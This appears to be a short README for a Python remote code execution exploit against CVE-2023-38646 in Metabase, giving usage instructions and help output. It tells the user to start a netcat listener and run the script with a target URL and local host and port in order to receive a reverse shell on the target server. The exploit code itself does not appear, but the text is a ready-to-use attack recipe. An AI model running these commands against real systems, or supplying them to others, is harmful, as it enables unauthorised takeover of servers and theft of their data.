A python RCE exploit for CVE-2023-38646
nc -lvnp <port>
python3 CVE-2023-38646.py -u <metabase_url> -l <local_ip> -p <local_port>
python3 CVE-2023-38646.py -h
usage: CVE-2023-38646.py [-h] -u URL -l LHOST -p LPORT
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL URL to exploit (root path for metabase)
-l LHOST, --lhost LHOST
LHOST for reverse shell
-p LPORT, --lport LPORT
LPORT for reverse shell